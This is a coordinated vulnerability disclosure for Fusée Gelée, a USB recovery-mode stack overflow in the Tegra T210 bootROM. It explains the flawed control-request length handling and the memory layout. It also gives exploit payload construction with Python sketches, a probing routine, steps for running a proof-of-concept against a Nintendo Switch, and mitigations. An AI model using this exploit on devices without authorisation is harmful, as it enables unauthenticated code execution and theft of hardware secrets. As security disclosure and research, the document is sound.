## Vulnerability Disclosure: Fusée Gelée

This report documents Fusée Gelée, a coldboot vulnerability that allows full,
unauthenticated arbitrary code execution from an early bootROM context via Tegra
Recovery Mode (RCM) on NVIDIA's Tegra line of embedded processors. As this
vulnerability allows arbitrary code execution on the Boot and Power Management
Processor (BPMP) before any lock-outs take effect, it compromises the entire
root-of-trust for each processor, and allows exfiltration of secrets such as
those burned into device fuses.

Quick vitals:       |
--------------------|--------------------------------------------------------
*Reporter:*         | Katherine Temkin (@ktemkin)
*Affiliation:*      | ReSwitched (https://reswitched.tech)
*E-mail:*           | k@ktemkin.com
*Affects:*          | Tegra SoCs, independent of software stack
*Versions:*         | believed to affect Tegra SoCs released prior to the T186 / X2
*Impact:*           | early bootROM code execution with no software requirements, which can lead to full compromise of on-device secrets where USB access is possible
*Disclosure:*       | public disclosure planned for June 15th, 2018

#### Vulnerability Summary

The USB software stack provided inside the boot instruction ROM (IROM/bootROM)
contains a copy operation whose length can be controlled by an attacker. By
carefully constructing a USB control request, an attacker can leverage this
vulnerability to copy the contents of an attacker-controlled buffer over the
active execution stack, gaining control of the Boot and Power Management
Processor (BPMP) before any lock-outs or privilege reductions occur. This
execution can then be used to exfiltrate secrets and to load arbitrary code onto
the main CPU Complex (CCPLEX) "application processors" at the highest possible
level of privilege (typically as the TrustZone Secure Monitor at PL3/EL3).

#### Public Disclosure Notice

This vulnerability is notable due to the significant number and variety of
devices affected, the severity of the issue, and the immutability of the relevant
code on devices already delivered to end users. This vulnerability report
is provided as a courtesy to help aid remediation efforts, guide communication,
and minimize impact to users.

As other groups appear to have this or an equivalent exploit--
[including a group who claims they will be selling access to an implementation of such an exploit](http://team-xecuter.com/team-xecuter-coming-to-your-nintendo-switch-console/)--
it is the belief of the author and the ReSwitched team that prompt public
disclosure best serves the public interest. Notifying the public minimizes the
information asymmetry between the general public and exploit-holders, and lets
users best assess how this vulnerability impacts their personal threat models.

Accordingly, ReSwitched anticipates public disclosure of this vulnerability:
  * If another group releases an implementation of the identified
    vulnerability; or
  * On June 15th, 2018, whichever comes first.

### Vulnerability Details

The core of the Tegra boot process is approximated by the following block of
pseudo-code, as obtained by reverse-engineering an IROM extracted from a
vulnerable T210 system:

```C
// If this is a warmboot (from "sleep"), restore the saved state from RAM.
if (read_scratch0_bit(1)) {
    restore_warmboot_image(&load_addr);
}
// Otherwise, bootstrap the processor.
else
{
    // Allow recovery mode to be forced by a PMC scratch bit or physical straps.
    force_recovery = check_for_rcm_straps() || read_scratch0_bit(2);

    // Determine whether to use USB2 or USB3 for RCM.
    determine_rcm_usb_version(&usb_version);
    usb_ops = set_up_usb_ops(usb_version);
    usb_ops->initialize();

    // If we're not forcing recovery, attempt to load an image from boot media.
    if (!force_recovery)
    {
        // If we succeeded, don't fall back into recovery mode.
        if (read_boot_configuration_and_images(&load_addr) == SUCCESS) {
            goto boot_complete;
        }
    }

    // In all other conditions, fall back to USB recovery mode.
    if (read_boot_images_via_usb_rcm(<snip>, &load_addr) != SUCCESS) {
        /* load address is poisoned here */
    }
}

boot_complete:
    /* apply lock-outs, and boot the program at address load_addr */
```

Tegra processors include a USB Recovery Mode (RCM), which we can observe to be activated under a number of conditions:
  * If the processor fails to find a valid Boot Control Table (BCT) + bootloader on its boot media;
  * If processor straps are pulled to a particular value e.g. by holding a button combination; or
  * If the processor is rebooted after a particular value is written into a power management controller scratch register.

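These conditions, together with the boot flow pseudo-code, can be condensed into a small host-side model. This is only an illustrative sketch in Python (the language of the accompanying PoC); the function and parameter names are invented for this example and do not correspond to bootROM symbols, and the warmboot path is deliberately left out.

```python
def enters_rcm(straps_asserted: bool, scratch0_bit2: bool, boot_media_ok: bool) -> bool:
    """Model whether a cold boot ends up in USB recovery mode (RCM).

    straps_asserted -- RCM straps are pulled (e.g. a button combination is held)
    scratch0_bit2   -- bit 2 of PMC scratch register zero was set before reboot
    boot_media_ok   -- a valid BCT + bootloader was found on the boot media
    """
    # Recovery can be forced by the physical straps or by the PMC scratch bit.
    force_recovery = straps_asserted or scratch0_bit2
    if force_recovery:
        return True

    # Otherwise RCM is only the fallback when loading from boot media fails.
    return not boot_media_ok
```

Under this model, a device with intact boot media and no forcing condition never reaches RCM, which matches the three entry routes listed for the Switch later in this report.
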
USB recovery mode is present in all devices, including devices that have been
production secured. To ensure that USB recovery mode does not allow unauthenticated
communications, RCM requires all recovery commands to be authenticated, using
either an RSA signature or an AES-CMAC.

The bootROM's implementation of the Tegra RCM protocol is simple, and exists
to allow loading a small piece of code (called the *miniloader* or *applet*) into
the bootROM's local Instruction RAM (IRAM). In a typical application, this
*applet* is `nvtboot-recovery`, a stub which allows further USB communications to
bootstrap a system or to allow system provisioning.

The RCM process is approximated by the following pseudo-code, again obtained via
reverse engineering a dumped IROM from a T210:

```C
// Significantly simplified for clarity, with error checking omitted where unimportant.
while (1) {
    // Repeatedly handle USB standard events on the control endpoint EP0.
    usb_ops->handle_control_requests(current_dma_buffer);

    // Try to send the device ID over the main USB data pipe until we succeed.
    if ( rcm_send_device_id() == USB_NOT_CONFIGURED ) {
        usb_initialized = 0;
    }
    // Once we've made a USB connection, accept RCM commands on EP1.
    else {
        usb_initialized = 1;

        // Read a full RCM command and any associated payload into a global buffer.
        // (Error checking omitted for brevity.)
        rcm_read_command_and_payload();

        // Validate the received RCM command; e.g. by checking for signatures
        // in RSA or AES_CMAC mode, or by trivially succeeding if we're not in
        // a secure mode.
        rc = rcm_validate_command();
        if (rc != VALIDATION_PASS) {
            return rc;
        }

        // Handle the received and validated command.
        // For a "load miniloader" command, this sanity checks the (validated)
        // miniloader image and takes steps to prevent re-use of signed data not
        // intended to be used as an RCM command.
        rcm_handle_command_complete(...);
    }
}
```

It is important to note that a full RCM command *and its associated payload*
are read into 1) a global buffer, and 2) the target load address, respectively,
before any signature checking is done. This effectively grants the attacker a
narrow window in which they control a large region of unvalidated memory.

The largest vulnerability surface area occurs in the `rcm_read_command_and_payload`
function, which accepts the RCM command and payload packets via a USB bulk endpoint.
For our purposes, this endpoint is essentially a simple pipe for conveyance
of blocks of binary data separate from standard USB communications.

The `rcm_read_command_and_payload` function actually contains several issues--
of which exactly one is known to be exploitable:

```C
uint32_t total_rxd   = 0;
uint32_t total_to_rx = 0x400;

// Loop until we've received our full command and payload.
while (total_rxd < total_to_rx) {
    // Switch between two DMA buffers, so the USB is never DMA'ing into the same
    // buffer that we're processing.
    active_buffer = next_buffer;
    next_buffer   = switch_dma_buffers();

    // Start a USB DMA transaction on the RCM bulk endpoint, which will hopefully
    // receive data from the host in the background as we copy.
    usb_ops->start_nonblocking_bulk_read(active_buffer, 0x1000);

    // If we're in the first 680 bytes we're receiving, this is part of the RCM
    // command, and we should read it into the command buffer.
    if ( total_rxd < 680 ) {
        /* copy data from the DMA buffer into the RCM command buffer until we've
           read a full 680-byte RCM command */

        // Once we've received the first four bytes of the RCM command,
        // use that to figure out how much data should be received.
        if ( total_rxd >= 4 )
        {
            // validate:
            //  -- the command won't exceed our total RAM
            //     (680 here, 0x30000 in upper IRAM)
            //  -- the command is >= 0x400 bytes
            //  -- the size ends in 8
            if ( rcm_command_buffer[0] >= 0x302A8u
                    || rcm_command_buffer[0] < 0x400u
                    || (rcm_command_buffer[0] & 0xF) != 8 ) {
                return ERROR_INVALID_SIZE;
            } else {
                total_to_rx = *((uint32_t *)rcm_command_buffer);
            }
        }
    }

    /* copy any data _past_ the command into a separate payload
       buffer at 0x40010000 */
    /* -code omitted for brevity - */

    // Wait for the DMA transaction to complete.
    // [This is, again, simplified to convey concepts.]
    while(!usb_ops->bulk_read_complete()) {

        // While we're blocking, it's still important that we respond to standard
        // USB packets on the control endpoint, so do that here.
        usb_ops->handle_control_requests(next_buffer);
    }
}
```

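The size validation in the pseudo-code above is easy to get wrong by one nibble, so it may help to restate it as a small host-side check. The sketch below is an illustrative Python model, not bootROM code; the constant and function names are assumptions made for this example, while the numeric limits are taken from the pseudo-code.

```python
RCM_COMMAND_SIZE = 680      # bytes of RCM command, per the pseudo-code
MAX_PAYLOAD_SIZE = 0x30000  # bytes of payload that fit in upper IRAM
MIN_TOTAL_SIZE = 0x400      # smallest total length the bootROM accepts


def is_valid_rcm_length(length: int) -> bool:
    """Mirror the three checks applied to the first word of an RCM command."""
    upper_limit = RCM_COMMAND_SIZE + MAX_PAYLOAD_SIZE  # 0x302A8, exclusive
    return MIN_TOTAL_SIZE <= length < upper_limit and (length & 0xF) == 8


def max_valid_rcm_length() -> int:
    """Find the largest length that passes validation."""
    upper_limit = RCM_COMMAND_SIZE + MAX_PAYLOAD_SIZE
    # Only the final 16 candidates need checking: exactly one has a low nibble of 8.
    return max(n for n in range(upper_limit - 16, upper_limit) if is_valid_rcm_length(n))
```

The largest accepted value under these checks is `0x30298`, which is the maximum length used when building the exploit payload later in this report.
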
Astute readers will notice an issue unrelated to the Fusée Gelée exploit: this
code fails to properly ensure DMA buffers are being used exclusively for a single
operation. This results in an interesting race condition in which a DMA buffer
can be simultaneously used to handle a control request and an RCM bulk transfer.
This can break the flow of RCM, but as both operations contain untrusted data,
this issue poses no security risk.

To find the actual vulnerability, we must delve deeper, into the code that
responds to standard USB control requests. A *control request* is initiated
when the host sends a setup packet of the following form:

Field     | Size | Description
----------|:----:|-----
direction | 1b   | if '1', the device should respond with data
type      | 2b   | specifies whether this request is of a standard type or not
recipient | 5b   | encodes the context in which this request should be considered; <br /> for example, is this about a `DEVICE` or about an `ENDPOINT`?
request   | 8b   | specifies the request number
value     | 16b  | argument to the request
index     | 16b  | argument to the request
length    | 16b  | specifies the maximum amount of data to be transferred

As an example, the host can request the status of a device by issuing a
`GET_STATUS` request, at which point the device would be expected to respond with
a short status response. Of particular note is the `length` field of the request,
which should *limit* -- but not exclusively determine -- the *maximum* amount of
data that should be included in the response. Per the specification, the device
should respond with either the *amount of data specified* or the *amount of data
available*, whichever is less.

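To make the field layout concrete, the following sketch packs the eight-byte setup packet for a `GET_STATUS` request. It is an illustrative host-side Python example rather than anything taken from the bootROM: the helper name is invented here, and the numeric constants are the standard values from chapter 9 of the USB 2.0 specification (the first three fields share a single byte, and the 16-bit fields are little-endian).

```python
import struct

# Standard USB 2.0 values for the fields described in the table above.
DIRECTION_IN = 1          # device-to-host
TYPE_STANDARD = 0
RECIPIENT_DEVICE = 0
RECIPIENT_INTERFACE = 1
RECIPIENT_ENDPOINT = 2
REQUEST_GET_STATUS = 0


def build_setup_packet(direction, req_type, recipient, request, value, index, length):
    """Pack the setup packet fields into their eight-byte wire format."""
    # direction (1 bit), type (2 bits) and recipient (5 bits) form one byte.
    request_type = (direction << 7) | (req_type << 5) | recipient
    return struct.pack("<BBHHH", request_type, request, value, index, length)


# A well-behaved host asks for exactly the two status bytes.
packet = build_setup_packet(DIRECTION_IN, TYPE_STANDARD, RECIPIENT_ENDPOINT,
                            REQUEST_GET_STATUS, value=0, index=0, length=2)
```

Because `length` is a 16-bit field, nothing in the wire format stops a host from asking for far more than two bytes; it is up to the device to cap the response.
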
The bootROM's handling of this behavior is conceptually implemented as
follows:

```C
// Temporary, automatic variables, located on the stack.
uint16_t status;
void *data_to_tx;

// The amount of data available to transmit.
uint16_t size_to_tx  = 0;

// The amount of data the USB host requested.
uint16_t length_read = setup_packet.length;

/* Lots of handler cases have been omitted for brevity. */

// Handle GET_STATUS requests.
if (setup_packet.request == REQUEST_GET_STATUS)
{
    // If this is asking for the DEVICE's status, respond accordingly.
    if (setup_packet.recipient == RECIPIENT_DEVICE) {
        status     = get_usb_device_status();
        size_to_tx = sizeof(status);
    }
    // Otherwise, respond with the ENDPOINT status.
    else if (setup_packet.recipient == RECIPIENT_ENDPOINT) {
        status     = get_usb_endpoint_status(setup_packet.index);
        size_to_tx = length_read; // <-- This is a critical error!
    }
    else {
        /* ... */
    }

    // Send the status value, which we'll copy from the stack variable 'status'.
    data_to_tx = &status;
}

// Copy the data we have into our DMA buffer for transmission.
// For a GET_STATUS request, this copies data from the stack into our DMA buffer.
memcpy(dma_buffer, data_to_tx, size_to_tx);

// If the host requested less data than we have, only send the amount requested.
// This effectively selects min(size_to_tx, length_read).
if (length_read < size_to_tx) {
    size_to_tx = length_read;
}

// Transmit the response we've constructed back to the host.
respond_to_control_request(dma_buffer, size_to_tx);
```

In most cases, the handler correctly limits the length of the transmitted
responses to the amount it has available, per the USB specification. However,
in a few notable cases, the length is *incorrectly always set to the amount
requested* by the host:
  * When issuing a `GET_CONFIGURATION` request with a `DEVICE` recipient.
  * When issuing a `GET_INTERFACE` request with an `INTERFACE` recipient.
  * When issuing a `GET_STATUS` request with an `ENDPOINT` recipient.

This is a critical security error, as the host can request up to 65,535 bytes per
control request. In cases where this is loaded directly into `size_to_tx`, this
value directly sets the extent of the `memcpy` that follows-- and thus can copy
up to 65,535 bytes into the currently selected `dma_buffer`. As the DMA buffers
used for the USB stack are each comparatively short, this can result in a _very_
significant buffer overflow.

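The difference between the flawed and the compliant length calculation can be summarized with a few lines of arithmetic. The Python sketch below is a model for illustration only; the function names are invented, and the `0x1000` buffer size used in the example is an assumption based on the size of the bulk reads in the earlier pseudo-code, as this report does not state the DMA buffer size directly.

```python
STATUS_SIZE = 2  # sizeof(uint16_t status) in the pseudo-code


def vulnerable_copy_size(requested_length: int) -> int:
    """memcpy extent on the flawed paths: whatever the host asked for."""
    return requested_length & 0xFFFF  # the setup packet's length field is 16 bits


def compliant_copy_size(requested_length: int, available: int = STATUS_SIZE) -> int:
    """What the USB specification calls for: the lesser of requested and available."""
    return min(requested_length & 0xFFFF, available)


def overflow_bytes(requested_length: int, dma_buffer_size: int) -> int:
    """Bytes written past the end of a DMA buffer of the given size."""
    return max(0, vulnerable_copy_size(requested_length) - dma_buffer_size)


# Example: a maximal request against an assumed 0x1000-byte DMA buffer.
print(hex(overflow_bytes(0xFFFF, 0x1000)))
```

A compliant handler never copies more than the two status bytes, regardless of what the host requests.
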
To validate that the vulnerability is present on a given device, one can try
issuing an oversized request and watch as the device responds. Pictured below is
the response generated when sending an oversized `GET_STATUS` control request
with an `ENDPOINT` recipient to a T124:

![Reading a chunk of stack memory from a K1](stack_read.png)

A compliant device should generate a two-byte response to a `GET_STATUS` request--
but the affected Tegra responds with a significantly longer response. This is a clear
indication that we've run into the vulnerability described above.

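A check along these lines could be scripted roughly as follows. This is a hedged sketch, not part of the accompanying PoC: the helper name is invented, and `device` is assumed to be an already-opened PyUSB device object (for example, one returned by `usb.core.find`), whose `ctrl_transfer` method takes the request type, request, value, index, length, and timeout. As discussed in the support note later in this report, some host driver stacks may refuse to issue large control requests at all.

```python
GET_STATUS_ENDPOINT_IN = 0x82   # direction IN, standard type, ENDPOINT recipient
REQUEST_GET_STATUS = 0x00
COMPLIANT_STATUS_LENGTH = 2     # a compliant device answers with two bytes


def responds_with_oversized_status(device, requested_length, timeout_ms=1000):
    """Issue GET_STATUS to an endpoint and report whether the reply is too long.

    `device` is assumed to expose PyUSB's ctrl_transfer() interface.
    """
    response = device.ctrl_transfer(
        GET_STATUS_ENDPOINT_IN,  # bmRequestType
        REQUEST_GET_STATUS,      # bRequest
        0,                       # wValue
        0,                       # wIndex (endpoint number)
        requested_length,        # wLength: the amount we ask the device for
        timeout_ms,
    )
    # Anything beyond two bytes is data the device should never have sent.
    return len(response) > COMPLIANT_STATUS_LENGTH
```

Taking the device as a parameter keeps the check independent of how the device was located, and makes it straightforward to exercise against a stand-in object without hardware attached.
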
To really understand the impact of this vulnerability, it helps to understand
the memory layout used by the bootROM. For our proof-of-concept, we'll consider
the layout used by the T210 variant of the affected bootROM:

![Bootrom memory layout](mem_layout.png)

The major memory regions relevant to this vulnerability are as follows:
  * The bootROM's *execution stack* grows downward from `0x40010000`; so the
    execution stack is located in the memory *immediately preceding* that address.
  * The DMA buffers used for USB are located at `0x40005000` and `0x40009000`,
    respectively. Because the USB stack alternates between these two buffers
    once per USB transfer, the host effectively can control which DMA buffer
    is in use by sending USB transfers.
  * Once the bootROM's RCM code receives a 680-byte command, it begins to store
    received data in a section of upper IRAM located at address `0x40010000`, and can
    store up to `0x30000` bytes of payload. This address is notable, as it is immediately
    past the end of the active execution stack.

Of particular note is the adjacency of the bootROM's *execution stack* and the
attacker-controlled *RCM payload*. Consider the behavior of the previous pseudo-code
segment on receipt of a `GET_STATUS` request to the `ENDPOINT` with an
excessive length. The resulting memcpy:
  * copies *up to* 65,535 bytes total;
  * sources data from a region *starting at the status variable on the stack*
    and extending significantly past the stack -- effectively copying mostly
    *from the attacker-controllable RCM payload buffer*; and
  * targets a buffer starting at either `0x40005000` or `0x40009000`, at the
    attacker's discretion, reaching addresses of up to `0x40014fff` or `0x40018fff`.

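The address arithmetic behind these figures can be checked with a short sketch. The Python below is purely illustrative; the names are invented for this example, and the addresses are the T210 values quoted in the text.

```python
STACK_TOP = 0x40010000          # the stack grows downward from here
LOWER_DMA_BUFFER = 0x40005000
UPPER_DMA_BUFFER = 0x40009000
MAX_CONTROL_LENGTH = 0xFFFF     # largest value of the 16-bit length field


def copy_end(dma_base: int, length: int = MAX_CONTROL_LENGTH) -> int:
    """Address reached by a copy of `length` bytes starting at `dma_base`."""
    return dma_base + length


def bytes_to_reach(dma_base: int, target: int = STACK_TOP) -> int:
    """Minimum copy length needed for the destination to extend up to `target`."""
    return target - dma_base


for name, base in (("lower", LOWER_DMA_BUFFER), ("upper", UPPER_DMA_BUFFER)):
    print(f"{name}: reaches {copy_end(base):#x}, "
          f"needs {bytes_to_reach(base):#x} bytes to reach the top of the stack")
```

Starting from the upper buffer, a copy needs `0x7000` bytes to reach the top of the stack, against `0xB000` bytes from the lower buffer; this is why targeting the upper buffer reduces the total amount of data that has to be copied.
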
This is a powerful copy primitive, as it copies *from attacker-controlled memory*
and into a region that *includes the entire execution stack*:

![Effect of the vulnerability memcpy](copy_span.png)

This would be a powerful exploit on any platform; but this is a particularly devastating
attack in the bootROM environment, which does not:
  * Use common attack mitigations such as stack canaries, ostensibly to reduce
    complexity and save limited IRAM and IROM space.
  * Apply memory protections, so the entire stack and all attacker-controlled
    buffers can be read from, written to, and executed from.
  * Employ typical 'application-processor' mitigation strategies such as ASLR.

Accordingly, we now have:
  1. The capability to load arbitrary payloads into memory via RCM, as RCM only
     validates command signatures once payload receipt is complete.
  2. The ability to copy attacker-controlled values over the execution stack,
     overwriting return addresses and redirecting execution to a location of our
     choice.

Together, these two abilities give us a full arbitrary-code execution exploit at
a critical point in the Tegra's start-up process. As control flow is hijacked
before return from `read_boot_images_via_usb_rcm`, none of the "lock-out"
operations that precede normal startup are executed. This means, for example,
that the T210 fuses-- and the keydata stored within them-- are accessible from
the attack payload, and the bootROM is not yet protected.

#### Exploit Execution

The Fusée Launcher PoC exploits the vulnerability described on the T210 via a
careful sequence of interactions:
1. The device is started in RCM mode. Device specifics will differ, but this
   is often via a key-combination held on startup.
2. A host computer is allowed to enumerate the RCM device normally.
3. The host reads the RCM device's ID by reading 16 bytes from EP1 IN.
4. The host builds an exploit payload, which is composed of:
    1. An RCM command that includes a maximum length, ensuring that we can send
       as much payload as possible without completing receipt of the RCM payload.
       Only the length of this command is used prior to validation; so we can
       submit an RCM command that starts with a maximum length of 0x30298, but
       which fills the remaining 676 bytes of the RCM command with any value.
    2. A set of values with which to overwrite the stack. As stack return address
       locations vary across the series, it's recommended that a large block
       composed of a single entry-point address be repeated a significant number
       of times, so one can effectively replace the entire stack with that address.
    3. The program to be executed ("final payload") is appended, ensuring that its
       position in the binary matches the entry-point from the previous step.
    4. The payload is padded to be evenly divisible by the 0x1000 block size to
       ensure the active block is not overwritten by the "DMA dual-use" bug
       described above.
5. The exploit payload is sent to the device over EP1 OUT, tracking the number of
   0x1000-byte "blocks" that have been sent to the device. If this number is _even_,
   the next write will be issued to the lower DMA buffer (`0x40005000`); otherwise,
   it will be issued to the upper DMA buffer (`0x40009000`).
6. If the next write would target the lower DMA buffer, issue another write
   of a full 0x1000 bytes to move the target to the upper DMA buffer, reducing
   the total amount of data to be copied.
7. Trigger the vulnerable memcpy by sending a `GET_STATUS` `IN` control
   request with an `ENDPOINT` recipient, and a length long enough to smash the
   desired stack region, and preferably not longer than required.

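The bookkeeping in steps 4 through 6 can be sketched in a few lines of host-side Python. This is a simplified illustration of the structure described above and not the layout used by `fusee-launcher.py`: the function names and the `spray_entries` parameter are invented for this example, and the placement of the repeated address directly after the command is an assumption made for brevity. The offsets that actually line up with the stack depend on the device and are not given here.

```python
import struct

RCM_COMMAND_SIZE = 680       # bytes of RCM command (4-byte length + 676 filler)
RCM_MAX_LENGTH = 0x30298     # largest length that passes the bootROM's checks
PAYLOAD_BASE = 0x40010000    # where data past the command is stored
BLOCK_SIZE = 0x1000


def build_exploit_stream(final_payload: bytes, spray_entries: int) -> bytes:
    """Assemble command + repeated entry-point address + program, block-padded."""
    # Step 4.1: only the length word matters before validation; zero-fill the rest.
    command = struct.pack("<I", RCM_MAX_LENGTH).ljust(RCM_COMMAND_SIZE, b"\x00")

    # Steps 4.2 and 4.3: the program follows the repeated address, so its entry
    # point is the payload base plus the size of the repeated block (illustrative).
    entry_point = PAYLOAD_BASE + 4 * spray_entries
    spray = struct.pack("<I", entry_point) * spray_entries

    # Step 4.4: pad to a whole number of 0x1000-byte blocks.
    stream = command + spray + final_payload
    return stream + b"\x00" * (-len(stream) % BLOCK_SIZE)


def next_write_targets_lower_buffer(blocks_sent: int) -> bool:
    """Step 5: an even block count means the lower DMA buffer is next."""
    return blocks_sent % 2 == 0


def blocks_to_send(stream: bytes) -> int:
    """Step 6: add one extra block if needed so the upper buffer is next."""
    blocks = len(stream) // BLOCK_SIZE
    if next_write_targets_lower_buffer(blocks):
        blocks += 1
    # Stay short of the advertised length so receipt never completes.
    if blocks * BLOCK_SIZE >= RCM_MAX_LENGTH:
        raise ValueError("stream too large: RCM receipt would complete")
    return blocks
```

Keeping the total below the advertised length matters because signature validation only runs once receipt completes; the control request in step 7 has to arrive while the bootROM is still waiting for data.
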
A simple host program that triggers this vulnerability is included with this
report: see `fusee-launcher.py`. Note the restrictions on its function in the
following section.

### Proof of Concept

Included with this report is a set of three files:
  * `fusee-launcher.py` -- The main proof-of-concept accompanying this report.
    This Python script is designed to launch a simple binary payload in the
    described bootROM context via the exploit.
  * `intermezzo.bin` -- This small stub is designed to relocate a payload from
    a higher load address to the standard RCM load address of `0x40010000`. This
    allows standard RCM payloads (such as `nvtboot-recover.bin`) to be executed.
  * `fusee.bin` -- An example payload for the Nintendo Switch, a representative
    and well-secured device based on a T210. This payload will print information
    from the device's fuses and protected IROM to the display, demonstrating that
    early bootROM execution has been achieved.

**Support note:** Many host-OS driver stacks are reluctant to issue unreasonably
large control requests. Accordingly, the current proof-of-concept includes code
designed to work in the following environments:
  * **64-bit Linux via `xhci_hcd`**. The proof-of-concept can manually submit
    large control requests, but does not work with the common `ehci_hcd` drivers
    due to driver limitations. A rough rule of thumb is that a connection via a
    blue / USB3 SuperSpeed port will almost always be handled by `xhci_hcd`.
  * **macOS**. The exploit works out of the box with no surprises or restrictions
    on modern macOS.

Windows support would require addition of a custom kernel module, and thus was
beyond the scope of a simple proof-of-concept.

To use this proof-of-concept on a Nintendo Switch:
1. Set up a Linux or macOS environment that meets the criteria above, and
   which has a working `python3` and `pyusb` as well as `libusb` installed.
2. Connect the Switch to your host PC with a USB A -> USB C cable.
3. Boot the Switch in RCM mode. There are three ways to do this, but the first--
   unseating its eMMC board-- is likely the most straightforward:
    1. Ensure the Switch cannot boot off its eMMC. The most straightforward way to
       do this is to open the back cover and remove the socketed eMMC board; corrupting
       the BCT or bootloader on the eMMC boot partition would also work.
    2. Trigger the RCM straps. Hold VOL_UP and short pin 10 on the right
       JoyCon connector to ground while engaging the power button.
    3. Set bit 2 of PMC scratch register zero. On modern firmwares, this requires
       EL3 or pre-sleep BPMP execution.
4. Run `fusee-launcher.py` with an argument of `fusee.bin`. (This requires
   `intermezzo.bin` to be located in the same folder as `fusee-launcher.py`.)

```
sudo python3 ./fusee-launcher.py fusee.bin
```

If everything functions correctly, your Switch should display a collection
of fuse and protected-IROM information:

![exploit working](switch_hax.jpg)

### Recommended Mitigations

In this case, the recommended mitigation is to correct the USB control request
handler such that it always correctly constrains the length to be transmitted.
This has to be handled according to the type of device:
  * **For a device already in consumer hands**, no solution is proposed.
    Unfortunately, access to the fuses needed to configure the device's ipatches
    was blocked when the ODM_PRODUCTION fuse was burned, so no bootROM update
    is possible. It is suggested that consumers be made aware of the situation
    so they can move to other devices, where possible.
  * **For new devices**, the correct solution is likely to introduce a
    new ipatch, or new ipatches, that limit the size of control request responses.

It seems likely that OEMs producing T210-based devices may move to T214 solutions;
it is the hope of the author that the T214's bootROM shares immunity with
the T186. If not, patching the above is a recommended modification to the mask ROM
and/or ipatches of the T214, as well.